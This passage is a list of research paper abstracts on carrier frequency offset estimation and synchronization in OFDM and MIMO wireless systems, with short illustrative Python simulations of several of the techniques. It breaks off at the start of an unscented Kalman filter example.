--- paper_title: Classification of Space-Time Block Codes Based on Second-Order Cyclostationarity with Transmission Impairments paper_content: Signal classification is important in various commercial and military applications. Multiple antenna systems complicate the signal classification problem since there is now the issue of estimating the number and configuration of transmit antennas. The novel blind classification algorithm proposed in this paper exploits the cyclostationarity property of space-time block codes (STBCs) for the classification of multiple antenna systems in the presence of possible transmission impairments. Analytical expressions for the second-order cyclic statistics used as the basis of the algorithm are derived, and the computational cost of the proposed algorithm is considered. This algorithm avoids the need for a priori knowledge of the channel coefficients, modulation, carrier phase, and timing offsets. Moreover, it does not need accurate information about the transmission data rate and carrier frequency offset. Monte Carlo simulation results demonstrate a good classification performance with low sensitivity to phase noise and channel effects, including frequency-selective fading and Doppler shift. --- paper_title: Joint Maximum Likelihood Estimation of CFO, Noise Power, and SNR in OFDM Systems paper_content: Estimation of noise power and signal-to-noise ratio (SNR) are fundamental tasks in wireless communications. Existing methods to recover these parameters in orthogonal frequency-division multiplexing (OFDM) are derived by following heuristic arguments and assuming perfect carrier frequency offset (CFO) synchronization. Hence, it is currently unknown how they compare with an optimum scheme performing joint maximum likelihood (ML) estimation of CFO, noise power and SNR. In the present work, the joint ML estimator of all these parameters is found by exploiting the repetitive structure of a training preamble composed of several identical parts. It turns out that CFO recovery is the first task that needs to be performed. After CFO compensation, the ML estimation of noise power and SNR reduces to a scheme that is available in the literature, but with a computational saving greater than 60% with respect to the original formulation. To assess the ultimate accuracy achievable by the ML scheme, novel expressions of the Cramer-Rao bound for the joint estimation of all unknown parameters are provided. --- paper_title: Efficient Phase-Error Suppression for Multiband OFDM-Based UWB Systems paper_content: This paper proposes an efficient phase-error suppression scheme for multiband (MB) orthogonal frequency-division multiplexing (OFDM)-based ultrawideband (UWB) communication systems. The proposed scheme consists of a clock-recovery loop and a common phase-error (CPE) tracking loop. The clock-recovery loop performs estimation of the sampling frequency offset (SFO) and its 2-D (time and frequency) compensation, while the CPE tracking loop estimates and corrects the phase errors caused by residual carrier frequency offset (CFO), residual SFO, and phase noise (PHN). The SFO and CPE estimators employ pilot-tone-based and channel-frequency-response (CFR)-weighted low-complexity approaches, each of which uses a robust error-reduction scheme without using angle calculations or divisions. Analytical results and numerical examples show the effectiveness of the proposed scheme in different multipath fading scenarios and signal-to-noise ratio (SNR) regimes. 
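The joint CFO/noise-power/SNR entry above stresses that, for a preamble made of identical parts, CFO recovery must come first, after which the remaining statistics follow from the repeated structure. The sketch below is a simplified two-half stand-in for that processing order (a Moose-style correlation for the CFO, then signal and noise power from the sum and difference of the halves); it is not the paper's exact joint ML estimator, and the preamble length, CFO, and noise variance are illustrative assumptions.

```python
import numpy as np

# Repeated-preamble processing: CFO from the half-to-half correlation, then
# noise power and SNR from the repeated structure after compensation.
rng = np.random.default_rng(3)
L = 128                                            # samples per preamble half
x = (rng.standard_normal(L) + 1j * rng.standard_normal(L)) / np.sqrt(2)
preamble = np.tile(x, 2)

eps_true, sigma2_true = 0.003, 0.1                 # |eps| must stay below 1/(2L)
n = np.arange(2 * L)
noise = np.sqrt(sigma2_true / 2) * (rng.standard_normal(2 * L) + 1j * rng.standard_normal(2 * L))
r = preamble * np.exp(2j * np.pi * eps_true * n) + noise

# 1) CFO from the phase of the half-to-half correlation, then compensate it
eps_hat = np.angle(np.sum(np.conj(r[:L]) * r[L:])) / (2 * np.pi * L)
r_c = r * np.exp(-2j * np.pi * eps_hat * n)

# 2) noise power from the difference of the halves, signal power from their mean
sigma2_hat = np.mean(np.abs(r_c[L:] - r_c[:L]) ** 2) / 2
p_sig_hat = np.mean(np.abs((r_c[:L] + r_c[L:]) / 2) ** 2) - sigma2_hat / 2
snr_db = 10 * np.log10(p_sig_hat / sigma2_hat)
print(f"eps_hat={eps_hat:.4f} (true {eps_true}), noise var={sigma2_hat:.3f}, SNR={snr_db:.1f} dB")
```

The correlation-based CFO estimate is unambiguous only for offsets below 1/(2L) cycles per sample; schemes with more, shorter repetitions trade accuracy for a wider acquisition range.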
--- paper_title: A Subspace-Based Two-Way Ranging System Using a Chirp Spread Spectrum Modem, Robust to Frequency Offset paper_content: Herein, we propose and implement a subspace-based two-way ranging system for high resolution indoor ranging that is robust to frequency offset. Due to the frequency offset between wireless nodes, issues about sampling frequency offset (SFO) and carrier frequency offset (CFO) arise in range estimation. Although the problem of SFO is resolved by adopting the symmetric double-sided two-way ranging (SDS-TWR) protocol, the CFO of the received signals impacts the time-of-arrival (TOA) estimation, obtained by conventional subspace-based algorithms such as ESPRIT and MUSIC. Nevertheless, the CFO issue has not been considered with subspace-based TOA estimation algorithms. Our proposed subspace-based algorithm, developed for TOA estimation robust to CFO, is based on the chirp spread spectrum (CSS) signals. Our subspace-based ranging system is implemented in an FPGA with a CSS modem using a hardware/software co-design methodology. Simulations and experimental results show that the proposed method can achieve robust ranging between the CSS nodes in an indoor environment with frequency offset. --- paper_title: Interference mitigation techniques for asynchronous multiple access communications in SIMO FBMC systems paper_content: In this paper we derive linear equalizers for FBMC systems. We focus on the multiple access channel where signals transmitted by different users may have different carrier frequency offsets and time delays. Aiming at reducing the bandwidth requirements of the periodic ranging messages, we formulate two SIMO solutions that are tolerant to time and frequency misalignments. Simulation-based results show that the same performance can be achieved in the BER range [10^-2, 10^-4] in comparison to an OFDM multi-user minimum mean square error receiver. Considering a guard interval between users, the BER range in which FBMC and OFDM perform equally can be broadened. However, the OFDM solution requires a complexity 8.6 times higher and its spectral efficiency is reduced by 0.72 b/s/Hz due to the cyclic prefix. --- paper_title: OFDM Transmission scheme for asynchronous two-way multi-relay cooperative networks with analog network coding paper_content: For two-way relaying assisted by analog network coding, most investigation so far is based on the perfect synchronization assumption. In contrast, in this paper we consider the more practical asynchronism assumption, and develop a new OFDM transmission scheme that is robust to the lack of synchronization in both timing and carrier frequency. In our scheme, the relays' signals are constructed by fusing several OFDM symbols received from the source nodes' transmissions. The source node receivers can successfully demodulate the received OFDM signals after effectively mitigating multiple carrier frequency offsets and multiple timing phase offsets. Simulations are conducted to demonstrate its superior performance. This scheme has the same bandwidth efficiency as the conventional OFDM transmission, and can achieve the same relaying gain as the existing multiple relay transmissions. By relieving the stringent synchronization requirement, this scheme leads to simplified relay design, which makes it more practical to exploit multiple relays in two-way relaying networks.
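The ranging entry above leans on the symmetric double-sided two-way ranging (SDS-TWR) protocol precisely because it suppresses clock-offset effects before the subspace-based TOA refinement. The toy calculation below illustrates that cancellation with two drifting clocks; the range, reply delays, and ppm offsets are illustrative values, and the CSS waveform and subspace processing of the paper are not modelled.

```python
# Toy SDS-TWR range calculation: each node measures only local intervals, and
# the two "round minus reply" terms cancel most of the clock drift.
c = 299_792_458.0
true_range = 25.0
tof = true_range / c

reply_a, reply_b = 300e-6, 280e-6        # local processing delays at nodes A and B
drift_a, drift_b = 1 + 8e-6, 1 - 12e-6   # clock frequency errors (ppm scale)

# intervals as measured by each node's own (drifting) clock
round_a = (2 * tof + reply_b) * drift_a
reply_b_meas = reply_b * drift_b
round_b = (2 * tof + reply_a) * drift_b
reply_a_meas = reply_a * drift_a

tof_hat = (round_a - reply_b_meas + round_b - reply_a_meas) / 4
print(f"estimated range: {tof_hat * c:.3f} m (true {true_range} m)")
```

The residual error scales with the product of the reply-time asymmetry and the clock-offset difference, which is why symmetric reply delays keep SDS-TWR accurate even with uncalibrated oscillators.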
--- paper_title: Differential Carrier Frequency Offset and Sampling Frequency Offset Estimation for 3GPP LTE paper_content: The Long Term Evolution (LTE) system, like other OFDM based systems, is very sensitive to synchronization errors which must be estimated and compensated. In this paper, maximum-likelihood (ML) estimates of the Carrier Frequency Offset (CFO) and Sampling Frequency Offset (SFO) are investigated in the framework of LTE downlink, aiming at precisely tracking time-varying fluctuations of the impairments. In order to make the tracking independent of the time index of the OFDM symbol, the differential CFO and SFO tracking algorithm are proposed. Combined with the phase ambiguity cancellation scheme, the differential tracking algorithm can work with high accuracy. The performances are analyzed and evaluated through simulations. --- paper_title: Blind CFO estimation algorithm for OFDM systems by using generalized precoding and trilinear model paper_content: This paper discusses the blind carrier frequency offset (CFO) estimation for orthogonal frequency division multiplexing (OFDM) systems by utilizing trilinear decomposition and generalized precoding. Firstly, the generalized precoding is employed to obtain multiple covariance matrices which are requisite for the trilinear model, and then a novel CFO estimation algorithm is proposed for the OFDM system. Compared with both the joint diagonalizer and estimation of signal parameters via rotational invariant technique (ESPRIT), the proposed algorithm enjoys a better CFO estimation performance. Furthermore, the proposed algorithm can work well without virtual carriers. Simulation results illustrate the performance of this algorithm. --- paper_title: A Unified Framework for Interference Analysis of Noncoherent MFSK Wireless Communications paper_content: This paper presents a new unified analytical technique for accurate interference analysis of noncoherent M-ary frequency shift keying (MFSK) wireless communication systems in the presence of additive white Gaussian noise (AWGN) and multiple arbitrary interfering signals. New exact bit error rate expressions are derived for nonorthogonal noncoherent binary FSK in the presence of an arbitrary number of interfering signals having arbitrary spectral shapes at arbitrary frequency offsets. Furthermore, tight upper bounds for the symbol and bit error rates are given for noncoherent MFSK with arbitrary tone spacings. These results are extended to include MFSK signals experiencing Rayleigh, Nakagami-m or Rician fading. Some specific interference scenarios are analyzed in details, including jammers with a given Doppler-spread, direct sequence spread spectrum and orthogonal frequency division multiplexing signals, and a Poisson field of arbitrary interferers. --- paper_title: A non-coherent neighbor cell search scheme for LTE/LTE-A systems paper_content: A new neighbor cell search algorithm for LTE/LTE-A systems is presented in this paper. To improve the interference problem in channel estimation for coherent SSS detection in the conventional neighbor cell search approaches, we propose a non-coherent scheme that takes advantage of the similarity of channel responses at adjacent subcarriers. The proposed neighbor cell search procedure not only includes both PSS and SSS detection, but also can combat different carrier frequency offsets that the home cell signal and the neighbor cell signal may suffer. 
The removal of the home cell synchronization signals in our algorithm converts the neighbor cell PSS and SSS into new sequences for recognition, respectively. By examining the cross-correlation properties of the new sequences, we show that partial correlation can well detect the neighbor cell sector ID and group ID through the new sequences. From simulation results, it is also clear that the proposed algorithm has good detection results and outperforms the conventional coherent approaches. --- paper_title: Carrier Frequency Offset Estimation for OFDM Direct-Conversion Receivers paper_content: We investigate the problem of carrier frequency offset (CFO) recovery in an OFDM direct-conversion receiver plagued by both dc-offset and frequency-selective I/Q imbalance. In order to enlarge the frequency acquisition range, the CFO is divided into an integer part, which is multiple of the subcarrier spacing, plus a remaining fractional part. The fractional CFO is firstly estimated by resorting to the least-squares (LS) principle using a suitably designed training sequence. Since the exact LS solution requires a complete search over the frequency uncertainty range, we propose a simpler scheme that dispenses from any peak-search procedure. We also derive an approximated closed-form expression of the estimation accuracy that reveals useful for assessing the impact of various design parameters on the system performance. After computing the fractional CFO, the integer frequency error is eventually retrieved by following a weighted LS approach. Numerical simulations and theoretical analysis indicate that the proposed scheme can be used to obtain accurate CFO estimates with affordable complexity. --- paper_title: Alamouti Coding Scheme for AF Relaying With Doppler Shifts paper_content: In this paper, we propose an Alamouti-code-based relaying scheme for frequency asynchronous amplify-and-forward (AF) relay networks. Both the oscillator frequency offsets and the Doppler shifts among the distributed nodes are considered in our design. We employ orthogonal frequency-division multiplexing (OFDM) modulation at the source node and let the two relay nodes implement only simple operations, such as time reversal, conjugation, and amplification. We show that without Doppler shifts, the multiple carrier frequency offsets (CFOs) can be directly compensated at the destination, and the received signals exhibit an Alamouti-like structure. We further prove that full spatial diversity can be achieved by the fast symbol-wise detection when the oscillator frequency offset between the relay nodes is smaller than a certain threshold, which yields lower decoding complexity compared with the existing schemes. In the case with Doppler shifts, where the direct CFO compensation becomes impossible, we develop a repetition-aided Alamouti coding approach, by which full diversity can be nearly achieved from the fast symbol-wise detection. Numerical results are provided to corroborate the proposed studies. --- paper_title: Sequence Designs for Interference Mitigation in Multi-Cell Networks paper_content: We propose a training sequence that can be used at the handshaking stage for multi-cell networks. The proposed sequence is theoretically proved to enjoy several nice properties including constant amplitude, zero autocorrelation, and orthogonality in multipath channels. 
Moreover, the analytical results show that the proposed sequence can greatly reduce the multi-cell interference (MCI) induced by carrier frequency offset (CFO) to a negligible level. Therefore, the CFO estimation algorithms designed for single-user or single-cell environments can be slightly modified, and applied in multi-cell environments; an example is given for showing how to modify the estimation algorithms. Consequently, the computational complexity can be dramatically reduced. Simulation results show that the proposed sequences and the CFO estimation algorithms outperform conventional schemes in multi-cell environments. --- paper_title: Optimized Joint Timing Synchronization and Channel Estimation for OFDM Systems paper_content: This paper addresses training-sequence-based joint timing synchronization and channel estimation for orthogonal frequency division multiplexing (OFDM) systems. The proposed approach consists of three stages. First, a coarse timing offset estimate is obtained. Then an advanced timing, relative timing indices, and channel impulse response estimates are obtained by maximum-likelihood estimation based on a sliding observation vector. Finally, the fine time adjustment based on the minimum mean squared error criterion is performed. The simulation results show that the proposed approach has excellent performance of timing synchronization in several channel models at low signal-to-noise ratio (SNR) which is smaller than 1dB. Moreover, for a low-density parity-check coded 1x2 single-input multiple-output OFDM system with maximum ratio combining, zero bit-error-rate is achievable using our proposed approach when SNR exceeds 1dB. --- paper_title: A Front End for Discriminative Learning in Automatic Modulation Classification paper_content: This work presents a novel method for automatic modulation classification based on discriminative learning. The features are the ordered magnitude and phase of the received symbols at the output of the matched filter. The results using the proposed front end and support vector machines are compared to other techniques. Frequency offset is also considered and the results show that in this condition the new method significantly outperforms two cumulant-based classifiers. --- paper_title: Physical-layer transceiving techniques on data-aided orthogonal frequency-division multiplexing towards seamless service on vehicular communications paper_content: Frequency error, non-ideal channel estimation (CE) and inefficient seamless road side unit (RSU) service are critical issues occurring in conventional systems that are completely specified by current IEEE 802.11p standards. This study investigates novel techniques for achieving accurate frequency offset compensation and effective CE and RSU selection for handover in signal-overlapping areas. Recently, communications using data-aided orthogonal frequency-division multiplexing (DA-OFDM), such as pseudo-random-postfix OFDM and time-domain-synchronous OFDM (TDS-OFDM), have been actively studied because of their higher effectiveness, efficiency and better transmission quality. This study consists of three parts: (i) derivation of the maximum likelihood estimation for DA-OFDM, (ii) design of an accurate RSU selection scheme and (iii) implementation of a superior TD CE technique. Performance comparisons between the conventional and the proposed techniques are conducted through comprehensive computer simulations. 
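The sequence-design entry above relies on constant-amplitude zero-autocorrelation (CAZAC) properties of its training sequences. As a hedged numerical illustration of what those properties mean, the sketch below generates a Zadoff-Chu sequence, a standard CAZAC family (also the basis of the training design in a later entry on coordinated multi-point transmission); it is not the specific construction of the cited paper, and the root and length are arbitrary example values.

```python
# Illustrative CAZAC check using a Zadoff-Chu sequence (a standard CAZAC family).
# Not the specific sequence construction of the cited paper; root u and length N
# are arbitrary example values (they only need to be coprime, with N odd here).
import numpy as np

def zadoff_chu(u, N):
    """Root-u Zadoff-Chu sequence of odd length N."""
    n = np.arange(N)
    return np.exp(-1j * np.pi * u * n * (n + 1) / N)

N, u = 63, 25
x = zadoff_chu(u, N)

# Constant amplitude: the spread of |x[n]| is numerically zero.
print("amplitude spread:", np.ptp(np.abs(x)))

# Zero periodic autocorrelation at every nonzero lag.
acf = [abs(np.vdot(x, np.roll(x, k))) for k in range(1, N)]
print("max off-peak periodic autocorrelation:", max(acf))
```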
--- paper_title: Implementation-friendly synchronisation algorithm for DVB-T2 paper_content: To support high-definition television, the revision of DVB-T, the terrestrial digital video broadcasting standard, has recently been developed under the abbreviation DVB-T2. The provision of the anticipated high data rate services requires highly accurate synchronisation and frequency acquisition and tracking. Setting out from the procedure defined by the DVB-T2 implementation guidelines provided by the DVB-T2 standardisation community, a modified, yet implementation-friendly synchronisation algorithm has been developed. Simulation results show a similar performance for synchronisation and frequency offset estimation, as well as the detection of the signalling information contained in the preamble P1 with a significant reduction of the implementation complexity. --- paper_title: Initial Synchronization Assisted by Inherent Diversity over Time-Varying Frequency-Selective Fading Channels paper_content: An initial synchronization technique based on novel estimations of the time error and carrier frequency offset (CFO) is investigated in this paper to operate in frequency-selective fading environments. Based on motivation from statistical derivations, a novel estimator is proposed by embedding matched filters (MFs) into the RAKE fingers to approach the modified Cramer-Rao lower bounds (MCRLBs). Meanwhile, a dual chirp signal is proven to have the ability to decorrelate the performances between the time-error and the CFO estimators. By taking advantage of pseudo-noise (PN) MFs, the individual channel tap-weighting coefficients can be extracted from the interpath interference on a path-by-path basis. The proposed technique is then built to approach the MCRLBs by taking advantage of the maximum ratio combining (MRC) criterion. In practice, the proposed technique can significantly outperform a conventional initial synchronization technique that is not assisted by the diversity in terms of higher probabilities of burst acquisition and lower mean-square errors (MSEs) on the time-error and CFO estimations over multipath fading channels. Comprehensive computer simulations were conducted to verify the improvements achieved using the technique that is statistically derived in this paper. --- paper_title: Maximum-likelihood based lock detectors for M-PSK carrier phase tracking loops paper_content: Carrier phase synchronisation is essential for coherent communications. Receivers typically use digital phase-locked loops (DPLLs) to acquire the carrier phase. The lock range of DPLLs, i.e. the range of frequency offsets that they can acquire, is usually significantly less than the initial frequency uncertainty in typical systems. Hence, acquisition is achieved by sweeping through the frequency uncertainty range, and stopping the sweep when the DPLL acquires the signal. Since the transmitted data symbols are in general unknown, successful acquisition is determined by a non-data aided carrier lock detector (CLD). In this reported work, a maximum-likelihood based CLD is derived which has low implementation complexity, and is better than existing CLDs while being impervious to errors in the receive Automatic Gain Control (AGC). 
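The last entry above concerns non-data-aided carrier lock detection for M-PSK tracking loops. A classic baseline for such a metric, sketched below purely as an illustration (the ML-derived detector of the cited paper is not reproduced here), removes the data modulation by raising the matched-filter outputs to the M-th power and thresholding the magnitude of their average: near lock the M-th power samples align in phase and the metric approaches one, while under a residual frequency offset they spin and the metric collapses toward zero.

```python
# Illustrative M-th power carrier lock metric for M-PSK (not the detector derived
# in the cited paper): raise symbols to the M-th power to strip the modulation,
# then measure how well the resulting phasors align.
import numpy as np

def lock_metric(symbols, M):
    z = symbols ** M                                    # data modulation removed
    return np.abs(np.mean(z)) / np.mean(np.abs(z))      # ~1 when locked, ~0 otherwise

rng = np.random.default_rng(0)
M, n = 4, 1000
data = np.exp(1j * 2 * np.pi * rng.integers(0, M, n) / M)        # QPSK symbols
noise = 0.1 * (rng.normal(size=n) + 1j * rng.normal(size=n))

locked = data + noise                                            # carrier acquired
unlocked = data * np.exp(1j * 2 * np.pi * 0.01 * np.arange(n)) + noise  # residual CFO

print("locked  :", lock_metric(locked, M))
print("unlocked:", lock_metric(unlocked, M))
```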
--- paper_title: A Novel Algebraic Carrier Frequency Offset Estimator for ASTC-MIMO-OFDM Systems Over a Correlated Frequency-Selective Channel paper_content: This paper presents a new algebraic carrier frequency offset (CFO) estimation technique for multiple-input-multiple-output (MIMO) orthogonal frequency-division multiplexing (OFDM) system, to overcome the sensitivity of algebraic space-time codes (ASTCs) to frequency synchronization in quasi-static correlated Rayleigh frequency-selective fading channels. The technique uses a preamble and is thus particularly suitable for burst-mode communications. The preamble consists of orthogonal training sequences that are simultaneously transmitted from the various transmit antennas. The proposed system exploits all subcarriers in the frequency domain, which provides a remarkable performance improvement, and reaches the Cramer-Rao lower bound (CRLB) at a high signal-to-noise ratio. The proposed method is compared with three known CFO estimators in the literature: Cyclic-Prefix-based (CP), Moose, and Classen techniques that show clear advantages. --- paper_title: Simultaneous Multiple Carrier Frequency Offsets Estimation for Coordinated Multi-Point Transmission in OFDM Systems paper_content: Orthogonal frequency division multiplexing (OFDM) combined with the coordinated multi-point (CoMP) transmission technique has been proposed to improve performance of the receivers located at the cell border. However, the inevitable carrier frequency offset (CFO) will destroy the orthogonality between subcarriers and induce strong inter-carrier interference (ICI) in OFDM systems. In a CoMP-OFDM system, the impact of CFO is more severe because of the mismatch in carrier frequencies among multiple transmitters. To reduce performance degradation, CFO estimation and compensation is essential. For simultaneous estimation of multiple CFOs, the performance of conventional CFO estimation schemes is significantly degraded by the mutual interference among the signals from different transmitters. In this work, our goal is to propose an effective approach that can simultaneously estimate multiple CFOs in the downlink by using the composite signal coming from multiple base stations corresponding to CoMP transmission. Based on the Zadoff-Chu sequences, we design an optimal set of training sequences, which minimizes the mutual interference and is robust to the variations in multiple CFOs. Then, we propose a maximum likelihood (ML)-based estimator, the robust multi-CFO estimation (RMCE) scheme, for simultaneous estimation of multiple CFOs. In addition, by incorporating iterative interference cancellation into the RMCE scheme, we propose an iterative scheme to further improve the estimation performance. According to the simulations, our scheme can eliminate the mutual interference effectively, approaching the Cramer-Rao bound performance. --- paper_title: Frequency-immune and low-complexity symbol timing synchronization scheme in OFDM systems paper_content: In this paper, we propose a simple time-domain replica correlation (TDRC) based symbol timing synchronization scheme in orthogonal frequency division multiplexing systems. By allocating a locally concatenated sequence of a base sequence and its modified sequence to total feasible frequency resources, we can achieve both hardware complexity and frequency offset reductions. 
The hardware complexity of a searcher is less than half that of existing TDRC-based schemes, such as the long-term evolution (LTE) scheme [3] and a performance-efficient scheme [8]. The proposed scheme also provides significant frequency offset immunity over the LTE scheme. The performance analysis and comparisons are made in terms of complexity and detection error probability. --- paper_title: Closed Form BER Expressions for BPSK OFDM Systems with Frequency Offset paper_content: This letter addresses the performance degradation caused by the presence of carrier frequency offset (CFO) in orthogonal frequency division multiplexing (OFDM) systems. Accurate closed form bit error rate (BER) expressions for BPSK-OFDM systems impaired by frequency offset are derived. The analysis is carried out for flat and frequency selective Rayleigh fading channels. Simulation results have been used to cross-check the accuracy of the theoretical analysis. --- paper_title: Blind carrier frequency offset estimator for multi-input multi-output-orthogonal frequency division multiplexing systems over frequency-selective fading channels paper_content: This study presents a new blind carrier frequency offset (CFO) estimation technique for multi-input multi-output (MIMO) orthogonal frequency division multiplexing (OFDM) systems employing space-time coding (STC). CFO estimation is crucial for OFDM systems to avoid the performance degradation caused by the inter-carrier interference that results when the CFO is not estimated and compensated accurately. Based on the assumptions that the data symbols are selected from a constant modulus constellation and the channel is varying slowly over time, a new blind CFO estimator is proposed by minimising the power difference between all subcarriers in two consecutive STC blocks. The proposed system therefore exploits all subcarriers in the time and frequency domains, which provides a remarkable performance improvement over other techniques reported in the literature. The complexity of the proposed estimator is substantially reduced by approximating the cost function by a sinusoid that can be minimised using direct closed-form computations within one OFDM symbol period. Monte Carlo simulations are used to assess the performance of the proposed system by means of mean squared error (MSE) in both static and time-varying frequency-selective fading channels. The simulation results demonstrate that the proposed estimator can eliminate the MSE error floors that usually appear at moderate and high signal-to-noise ratios for estimators that work only in the frequency domain. --- paper_title: Multi-User Interference Cancellation Schemes for Carrier Frequency Offset Compensation in Uplink OFDMA paper_content: Each user in the uplink of an Orthogonal Frequency Division Multiple Access (OFDMA) system may experience a different carrier frequency offset (CFO). These uncorrected CFOs destroy the orthogonality among subcarriers, causing inter-carrier interference and multi-user interference, which degrade the system performance severely. In this paper, novel time-domain multi-user interference cancellation schemes for the OFDMA uplink are proposed. They employ an architecture with multiple OFDMA demodulators to compensate for the impacts of multi-user CFOs at the base station's side. Analytical and numerical evaluations show that the proposed schemes achieve a significant performance gain compared to the conventional receiver and a reference frequency-domain multi-user interference cancellation scheme.
In a particular scenario, a maximum CFO of up to 40% of the subcarrier spacing can be tolerated, and the CFO-free performance is maintained in the OFDMA uplink. --- paper_title: Resource Block Basis MMSE Beamforming for Interference Suppression in LTE Uplink paper_content: This paper proposes a new method to suppress interference using antenna array for LTE uplink. The proposed method does not require knowledge on resource allocation of either interfering or communicating mobile stations, and thus it has a significant advantage of ease of implementation. An additional advantage of this method is parallelization and scalability for multi-core processing. This paper also proposes a novel iterative timing offset compensation to enable effective interference suppression. The proposed method has been successfully implemented on System-on-Chip consisting of multi-core DSP and ARM microprocessors and verified that it successfully suppresses interference in real time. --- paper_title: Frequency Synchronization for Multiuser MIMO-OFDM System Using Bayesian Approach paper_content: This paper addresses the problem of frequency synchronization in multiuser multiple-input multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) systems. Different from existing work, a Bayesian approach is used in the parameter estimation problem. In this paper, the Bayes estimator for carrier frequency offset (CFO) estimation is proposed and the Bayesian Cram'er-Rao bound (BCRB) is also derived in closed form. Direct implementation of the resultant estimation scheme with conventional methods is challenging since a high degree of mathematical sophistication is always required. To solve this problem, the Gibbs sampler is exploited with an efficient sample generation method. Simulation results illustrate the effectiveness of the proposed estimation scheme. --- paper_title: A Low-Power Low-Cost GFSK Demodulator With a Robust Frequency Offset Tolerance paper_content: A low-power low-cost Gaussian frequency shift keying demodulator with a robust frequency offset tolerance is presented. A novel automatic pulse duration calibration is employed to keep the pulse durations of the zero-crossing detection output constant against process variation. Additionally, a discrete-time differentiator is adopted to eliminate the negative effect of frequency offset and drift. The demodulator is implemented in a 0.18-μm CMOS process and the area is approximately 0.08 mm ::: 2 ::: . It can recover data even as the intermediate frequency drifts from 1.5 up to 3.7 MHz during demodulation and requires a signal-to-noise ratio of less than 16.5 dB for a 0.1% bit error rate. The circuit consumes only a 0.51-mA current from a 1.8-V supply. --- paper_title: A New Synchronization Scheme for OFDM-Based Cooperative Relay Systems paper_content: In cooperative relay systems, relayed signals propagate through different channels and are received at the destination node with distinct timing and carrier frequency offsets (CFOs). This feature makes synchronization a rather challenging task as compared with centralized multiple-input multiple-output systems. Unlike conventional preamble designs with good correlation properties only in time domain or frequency domain, a new preamble that has good correlation properties in both time domain and frequency domain is proposed for synchronization in orthogonal frequency-division multiplexing (OFDM) based cooperative relay systems. 
According to the proposed preamble, a synchronization scheme is developed and a practical threshold is derived that jointly considers the statistic distribution of the correlation function output and the inevitable interference originated from residual CFOs to assist fine timing synchronization. Simulation results verify that the proposed scheme provides notable performance improvement as compared with a previous related work. --- paper_title: An Unscented Kalman Filter for ICI Cancellation in High-Mobility OFDM System paper_content: OFDM system suffers from inter-carrier interference due to frequency offset produced by the movement of terminals. Several schemes have been proposed to mitigate this type of interference. In this paper, an unscented Kalman filter (UKF) based methodology is addressed to estimate the carrier frequency offset (CFO).We have compared the BER performance of UKF with other schemes and also analyzed the convergence as well as accuracy behavior between UKF and EKF. The simulation result shows that comparing to conventional non-iterative methods, UKF and EKF have higher accuracy and efficiency. Furthermore, UKF surpasses EKF in convergence rate and consistency. --- paper_title: A Compact Preamble Design for Synchronization in Distributed MIMO OFDM Systems paper_content: In distributed multiple input multiple output (MIMO) orthogonal frequency division multiplexing (OFDM) systems, signals arrive at the receiver on different timing and are characterized by distinct carrier frequency offsets (CFOs), which makes synchronization rather challenging than that associated with centralized MIMO systems. Current solutions to this problem are mainly based on special preamble designs, where different training sequences are cascaded and then separately used to assist timing synchronization and CFO estimation. Such preamble designs not only increase system overhead but also burden the receivers with independent algorithms for timing synchronization and CFO estimation. In this paper, we propose a low-overhead (compact) preamble having the same length as one OFDM symbol, along with a unified algorithm for both timing synchronization and CFO estimation. Furthermore, the CFO estimation range can be flexibly extended to cope with larger CFOs in the proposed approach. Under the same training overhead and power consumption, simulation results indicate that the proposed approach outperforms a timing synchronization scheme that based on unequal period synchronization patterns. --- paper_title: Improved schemes for tracking residual frequency offset in DVB-T systems paper_content: Carrier frequency offset (CFO) synchronization is a crucial issue in the implementation of orthogonal frequency division multiplexing (OFDM) systems. Synchronization is performed in two stages: acquisition and tracking. After a first estimation and correction of the CFO performed in the acquisition stage, there still remains a residual frequency offset (RFO) due to real system conditions. This paper presents two new schemes for RFO tracking affecting a digital video broadcasting (DVB-T) system. Due to the nature of DVB-T, where data transmission is performed continuously, RFO tracking needs to be performed accurately during all the data length in order to correct the ICI and the phase rotation impairment produced by this RFO. Comparisons of the novel algorithms with two previously reported estimators in terms of mean square error (MSE), complexity and speed of convergence are performed. 
The proposed schemes improve performance and/or speed of convergence compared to the conventional estimators with a reduction of the computational complexity. Furthermore, a combined technique for RFO tracking involving the two new schemes is proposed. This method obtains the best results in terms of accuracy, convergence and complexity. --- paper_title: Semi-blind MIMO OFDM systems with precoding aided CFO estimation and ICA based equalization paper_content: We propose a semi-blind multiple-input multiple-output (MIMO) orthogonal frequency division multiplexing (OFDM) system, with a precoding aided carrier frequency offset (CFO) estimation approach, and an independent component analysis (ICA) based equalization structure. A number of reference data sequences are carefully designed offline and are superimposed to source data via a non-redundant linear precoding process, which can kill two birds with one stone, without introducing any extra total transmit power and spectral overhead. First, the reference data sequences are selected from a pool of carefully designed orthogonal sequences. The CFO estimation is to minimize the sum cross-correlation between the CFO compensated signals and the rest orthogonal sequences in the pool. Second, the same reference data enable elimination of the permutation and quadrant ambiguity in the ICA equalized signals by maximizing the cross-correlation between the ICA equalized signals and the reference data. Simulation results show that, without extra bandwidth and power needed, the proposed semi-blind system achieves a bit error rate (BER) performance close to the ideal case with perfect channel state information (CSI) and no CFO. Also, the precoding aided CFO estimation outperforms the constant amplitude zero autocorrelation (CAZAC) sequences based CFO estimation approach, with no spectral overhead. --- paper_title: A Novel Timing Synchronization Method for OFDM Systems paper_content: In this letter, a novel timing offset estimation method is presented for orthogonal frequency division multiplexing (OFDM) systems. The proposed method is developed on the basis of the cyclic structure of OFDM symbol and uses a new noise subspace based metric to estimate the timing offset. Simulation results show that the proposed method has a significantly higher probability of correct estimation of the timing offset than the other methods in multipath channels. --- paper_title: Blind Estimation of OFDM Parameters in Cognitive Radio Networks paper_content: This paper presents a blind parameter estimation algorithm for orthogonal frequency division multiplexing (OFDM) signal affected by a time-dispersive channel, timing offset, carrier frequency offset and additive Gaussian noise. Unlike the previous studies, this paper presents the second-order cyclostationarity of OFDM signal considering the effect of time-dispersive channel. The cyclostationarity properties of received OFDM signal in time-dispersive channel is exploited to estimate the OFDM parameters. These parameters includes OFDM symbol period, useful symbol period, cyclic prefix factor, number of subcarriers and carrier frequency offset. Simulations are performed to investigate the performance of OFDM parameter estimation algorithm in diverse channel conditions. 
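Several tracking entries in this part of the list, notably the unscented Kalman filter for ICI cancellation and the residual-frequency-offset trackers above, treat the CFO as a slowly varying state to be filtered. The sketch below is a minimal scalar unscented Kalman filter that tracks a normalized CFO from noisy phasor observations; it is only an assumed toy model for illustration, not the formulation of any cited paper, and every parameter value is hypothetical.

```python
# Minimal scalar UKF tracking a slowly drifting normalized CFO eps from noisy
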